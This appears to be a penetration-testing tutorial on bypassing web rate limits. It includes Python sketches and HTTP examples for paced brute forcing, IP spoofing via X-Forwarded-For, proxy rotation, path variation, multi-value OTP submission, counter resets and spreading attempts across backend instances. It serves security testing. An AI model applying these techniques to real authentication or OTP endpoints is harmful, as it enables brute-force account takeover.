Improper Rate Limits
A rate limit is used for bandwidth throttling and/or limiting the number of attempts, for instance, when checking passwords or OTP codes. If a rate limit is missing, it becomes possible to send an arbitrary number of requests.
If the established restrictions are violated, an application may return `429 Too Many Requests` or `200 OK` with an error in the response body. However, an application may also leave the HTTP code and response body unchanged, creating the appearance of a missing rate limit. In some cases you can verify this behavior by entering a valid value, for instance, a valid password or OTP, thus simulating the final result of a brute-force attack.
Rate limit algorithms can only respond to how many requests were made in a certain period of time. If you send requests in n threads, the rate limit algorithm will throttle the bandwidth. To avoid this behavior, send requests in a single thread, possibly even with a delay between requests.
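A minimal sketch of this single-threaded, paced approach in Python. The send function is injected (a real one would perform the actual HTTP request), so only the pacing logic is shown; the delay value is an assumption to be tuned per target:

```python
import time
from typing import Callable, Iterable, Optional

def paced_bruteforce(
    send: Callable[[str], bool],
    candidates: Iterable[str],
    delay: float = 1.0,
) -> Optional[str]:
    """Try candidates one at a time in a single thread,
    sleeping between attempts so requests are not seen as a burst."""
    for candidate in candidates:
        if send(candidate):  # send() returns True on success
            return candidate
        time.sleep(delay)
    return None

# Example with a fake send function standing in for a real HTTP request:
attempts = []
def fake_send(code: str) -> bool:
    attempts.append(code)
    return code == "1337"

found = paced_bruteforce(fake_send, ["0000", "1234", "1337"], delay=0.0)
```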
Many rate limit algorithms rely on the client's IP address when deciding whether to block a request. If you change the IP address, or make the server think the request came from another IP, you can bypass this restriction.
If an application relies on the value of HTTP headers to determine the original IP address of a client, you can try to override the IP address with headers such as `X-Forwarded-For`, `X-Real-IP`, `X-Originating-IP`, `X-Client-IP`, `True-Client-IP`, or `Forwarded`.
For instance, you can add the `X-Forwarded-For` header to the OTP check request:

```http
POST /api/v1/otp/check HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For: 127.0.0.1
```
You can use a proxy or VPN to change your IP address. To automate changing IP addresses, use the following methods:
- A ready-made or self-written script with a large number of proxy servers or VPNs.
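Such a script can be as simple as cycling through a pool of proxies so that every request appears to come from a different IP. A sketch in Python; the proxy addresses below are hypothetical placeholders:

```python
import itertools

# Hypothetical proxy pool; in practice this would be a large list
# of proxy servers or VPN exit points.
PROXIES = [
    "http://10.0.0.1:8080",
    "http://10.0.0.2:8080",
    "http://10.0.0.3:8080",
]

proxy_pool = itertools.cycle(PROXIES)

def next_request_proxy() -> str:
    """Return a different proxy for each request, wrapping around
    when the pool is exhausted."""
    return next(proxy_pool)

# With the requests library this could be used roughly as:
#   p = next_request_proxy()
#   requests.post(url, data=payload, proxies={"http": p, "https": p})
```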
Try changing the endpoint path to bypass rate limits: use a different case or add extra symbols, such as `%20`. For instance, if the bare endpoint is `/api/v4/endpoint`, try the following variations:

- `/api/v4/Endpoint`
- `/api/v4/endpoint/`
- `/api/v4/endpoint%20`
- `/api/v4/./endpoint`
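Such variations can be generated programmatically. A sketch of a small helper; the exact set of mutations worth trying is an assumption and depends on how the target normalizes paths:

```python
def path_variants(path: str) -> list:
    """Generate simple case and extra-symbol variations of an
    endpoint path that a rate limiter may treat as distinct keys
    while the router still maps them to the same handler."""
    head, _, last = path.rpartition("/")
    return [
        head + "/" + last.capitalize(),  # different case
        head + "/" + last.upper(),       # all upper case
        path + "/",                      # trailing slash
        path + "%20",                    # URL-encoded space
        head + "/./" + last,             # path traversal no-op
    ]

variants = path_variants("/api/v4/endpoint")
```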
Also, you can try to add extra parameters, for example, `/api/v4/endpoint?param=anything`.
When brute-forcing, try passing several values in one request at once. An application may process such a request correctly but count it as a single attempt, which significantly increases the number of possible attempts.
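For instance, an OTP check endpoint that expects a single code might also accept an array of codes. The endpoint, host, and parameter name below are assumptions for illustration:

```http
POST /api/v1/otp/check HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json

{"code": ["0000", "0001", "0002", "0003"]}
```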
An application can implement different rate limits for authenticated and unauthenticated users. For instance, after authentication, there may be no rate limits on attempts to change a password or disable two-factor authentication.
An application may incorrectly implement rate limits or have a logical vulnerability that allows a user to reset the limits.
For example, an application may reset the limit on check attempts whenever a new OTP is requested, so you can reset the rate limit before each OTP check attempt and it will never be reached. Or an application may store the remaining number of attempts in a cookie, and you can reset the limit by spoofing the cookie.
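The resend-before-check flaw can be sketched as follows. The `resend_otp` and `check_otp` functions are hypothetical stand-ins for the real HTTP requests; the sketch assumes, as in the flaw described above, that resending resets the attempt counter:

```python
from typing import Callable, List, Optional

def check_with_reset(
    resend_otp: Callable[[], None],
    check_otp: Callable[[str], bool],
    candidates: List[str],
) -> Optional[str]:
    """Request a new OTP before every check attempt so the
    remaining-attempts counter is reset each time and the
    rate limit is never reached."""
    for candidate in candidates:
        resend_otp()  # resets the attempt counter on the server
        if check_otp(candidate):
            return candidate
    return None
```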
Often, an application backend is deployed on multiple instances that run in parallel. When a client sends a request to the backend, a load balancer ties the user's session to a specific instance, for example by setting a custom HTTP header or cookie with an instance ID. If rate limit values are not synchronized between instances, you can increase the number of available attempts by sending requests to different instances. To find out existing IDs, try sending requests to the backend from different IPs and without the header or cookie; the balancer will assign a random instance to such requests and return its ID in the header or cookie.
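Once the instance IDs are collected, attempts can be spread across them in round-robin order. A sketch; `send_to_instance` is a hypothetical function that would set the balancer's pinning header or cookie to the given ID before sending the request:

```python
import itertools
from typing import Callable, List, Optional

def spread_attempts(
    instance_ids: List[str],
    send_to_instance: Callable[[str, str], bool],
    candidates: List[str],
) -> Optional[str]:
    """Distribute attempts across backend instances. If each
    instance keeps its own counter, the effective number of
    attempts is multiplied by the number of instances."""
    instances = itertools.cycle(instance_ids)
    for candidate in candidates:
        # The instance ID would be sent in the balancer's pinning
        # cookie or custom HTTP header.
        if send_to_instance(next(instances), candidate):
            return candidate
    return None
```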